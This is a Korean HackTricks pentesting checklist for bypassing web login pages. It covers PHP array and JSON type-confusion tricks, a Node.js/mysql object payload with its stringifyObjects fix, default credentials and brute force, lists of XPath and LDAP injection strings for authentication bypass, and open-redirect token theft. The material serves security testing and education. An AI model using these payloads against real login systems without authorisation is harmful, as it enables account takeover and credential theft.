로그인 우회
Reading time: 4 minutes
tip
AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks 지원하기
- 구독 계획 확인하기!
- **💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
- HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.
정상 로그인 우회
로그인 페이지를 찾으면, 이를 우회하기 위해 시도할 수 있는 몇 가지 기술이 있습니다:
- 페이지 내 주석 확인 (아래로 스크롤하고 오른쪽으로?)
- 제한된 페이지에 직접 접근할 수 있는지 확인
- 매개변수를 전송하지 않기 (아무것도 전송하지 않거나 1개만 전송)
- PHP 비교 오류 확인:
user[]=a&pwd=b
,user=a&pwd[]=b
,user[]=a&pwd[]=b
- 내용 유형을 json으로 변경하고 json 값을 전송 (bool true 포함)
- POST가 지원되지 않는다는 응답을 받으면 GET 요청으로 본문에 JSON을 전송해 볼 수 있습니다:
Content-Type: application/json
- nodejs의 잠재적 파싱 오류 확인 (읽어보세요 이것):
password[password]=1
- Nodejs는 해당 페이로드를 다음과 유사한 쿼리로 변환합니다:
SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``
password=password=1
;
이는 비밀번호 비트가 항상 true가 되도록 만듭니다. - JSON 객체를 보낼 수 있다면
"password":{"password": 1}
을 전송하여 로그인을 우회할 수 있습니다. - 이 로그인을 우회하려면 여전히 유효한 사용자 이름을 알고 전송해야 한다는 점을 기억하세요.
mysql.createConnection
을 호출할 때"stringifyObjects":true
옵션을 추가하면Object
가 매개변수로 전달될 때 모든 예기치 않은 동작을 차단할 수 있습니다.- 자격 증명 확인:
- 사용 중인 기술/플랫폼의 기본 자격 증명
- 일반 조합 (root, admin, password, 기술 이름, 기본 사용자와 이 중 하나의 비밀번호).
- Cewl을 사용하여 사전을 만들고 기본 사용자 이름과 비밀번호(있는 경우)를 추가한 후 모든 단어를 사용자 이름과 비밀번호로 사용하여 무차별 대입 시도
- 더 큰 사전을 사용하여 무차별 대입 (무차별 대입)
SQL 인젝션 인증 우회
여기에서 SQL 인젝션을 통해 로그인을 우회하는 여러 가지 요령을 찾을 수 있습니다.
다음 페이지에서는 SQL 인젝션을 통해 로그인을 우회하기 위해 시도할 수 있는 사용자 정의 목록을 찾을 수 있습니다:
NoSQL 인젝션 인증 우회
여기에서 NoSQL 인젝션을 통해 로그인을 우회하는 여러 가지 요령을 찾을 수 있습니다.
NoSQL 인젝션은 매개변수 값을 변경해야 하므로 수동으로 테스트해야 합니다.
XPath 인젝션 인증 우회
여기에서 XPath 인젝션을 통해 로그인을 우회하는 여러 가지 요령을 찾을 수 있습니다
' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2
LDAP Injection 인증 우회
여기에서 LDAP Injection을 통한 로그인 우회에 대한 여러 가지 트릭을 찾을 수 있습니다.
*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|
Remember Me
페이지에 "Remember Me" 기능이 있는 경우, 그것이 어떻게 구현되어 있는지 확인하고 다른 계정을 탈취할 수 있는지 확인하세요.
Redirects
페이지는 일반적으로 로그인 후 사용자를 리디렉션합니다. 그 리디렉션을 변경하여 Open Redirect를 유발할 수 있는지 확인하세요. 사용자를 귀하의 웹사이트로 리디렉션하면 일부 정보(코드, 쿠키 등)를 훔칠 수 있을지도 모릅니다.
Other Checks
- 로그인 기능을 악용하여 사용자 이름을 열거할 수 있는지 확인하세요.
- 비밀번호/민감한 정보 양식의 입력에서 자동 완성이 활성화되어 있는지 확인하세요:
<input autocomplete="false">
Automatic Tools
tip
AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks 지원하기
- 구독 계획 확인하기!
- **💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
- HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.